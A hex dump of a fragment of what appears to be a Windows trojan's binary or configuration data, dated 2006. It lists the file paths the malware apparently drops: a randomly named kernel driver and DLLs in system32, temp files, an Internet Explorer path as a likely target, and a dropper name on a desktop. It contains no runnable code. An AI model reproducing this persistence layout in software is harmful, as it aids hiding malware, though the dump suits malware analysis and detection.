000AF0F0  00 00 00 00 53 48 45 44 55 00 00 00 00 00 00 00  ....SHEDU.......
000AF100  00 00 00 00 00 00 00 00 00 00 00 00 59 69 65 6F  ............Yieo
000AF110  78 73 79 66 00 00 00 00 00 00 00 00 43 3A 5C 50  xsyf........C:\P
000AF120  72 6F 67 72 61 6D 20 46 69 6C 65 73 5C 49 6E 74  rogram Files\Int
000AF130  65 72 6E 65 74 20 45 78 70 6C 6F 72 65 72 5C 69  ernet Explorer\i
000AF140  65 78 70 6C 6F 72 65 2E 65 78 65 00 00 00 00 00  explore.exe.....
000AF150  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF160  67 6F 6C 64 73 75 6E 00 00 00 00 00 00 00 00 00  goldsun.........
000AF170  00 00 00 00 00 00 00 00 FB 4F 50 4F 7B 5B FE 47  ........?PO{[?
000AF180  82 F4 A2 7C 89 5E 37 3D 43 3A 5C 44 6F 63 75 6D  ?Ⅻ?7=C:\Docum
000AF190  65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67  ents and Setting
000AF1A0  73 5C 67 61 74 65 73 5C D7 C0 C3 E6 5C 73 68 6E  s\gates\桌面\shn
000AF1B0  6F 6B 65 79 2E 65 78 65 00 00 00 00 00 00 00 00  okey.exe........
000AF1C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF1F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF200  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF210  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF220  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF230  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF240  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF250  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF260  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF270  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF280  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF290  5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72  \system32\driver
000AF2A0  73 5C 59 69 65 6F 78 73 79 66 2E 73 79 73 00 00  s\Yieoxsyf.sys..
000AF2B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF2F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF300  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF310  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF320  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF330  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF340  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF350  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF360  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF370  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF380  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF390  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF3A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF3B0  2E 74 6D 70 00 00 00 00 00 00 00 00 00 00 00 00  .tmp............
000AF3C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF3F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF400  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF410  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF420  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF430  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF440  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF450  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF460  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF470  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF480  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF490  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF4A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF4B0  2E 64 6C 31 00 00 00 00 00 00 00 00 00 00 00 00  .dl1............
000AF4C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF4F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF500  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF510  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF520  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF530  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF540  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF550  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF560  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF570  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF580  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF590  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
000AF5A0  79 66 2E 64 31 6C 00 00 00 00 00 00 00 00 00 00  yf.d1l..........
000AF5B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF5F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF600  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF610  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF620  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF630  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF640  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF650  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF660  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF670  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF680  00 00 00 00 00 00 00 00 43 3A 5C 57 49 4E 4E 54  ........C:\WINNT
000AF690  5C 73 79 73 74 65 6D 33 32 5C 59 69 65 6F 78 73  \system32\Yieoxs
000AF6A0  79 66 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00  yf.dll..........
000AF6B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF6F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF700  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF710  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF720  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF730  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF740  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF750  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF760  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF770  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF780  00 00 00 00 00 00 00 00 43 3A 5C 44 4F 43 55 4D  ........C:\DOCUM
000AF790  45 7E 31 5C 67 61 74 65 73 5C 4C 4F 43 41 4C 53  E~1\gates\LOCALS
000AF7A0  7E 31 5C 54 65 6D 70 5C 59 69 65 6F 78 73 79 66  ~1\Temp\Yieoxsyf
000AF7B0  2E 6C 6F 67 00 00 00 00 00 00 00 00 00 00 00 00  .log............
000AF7C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF7F0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF800  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF810  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF820  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF830  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF840  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF850  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF860  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF870  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000AF880  00 00 00 00 00 00 00 00                          ........

2006-12-22 11:31

0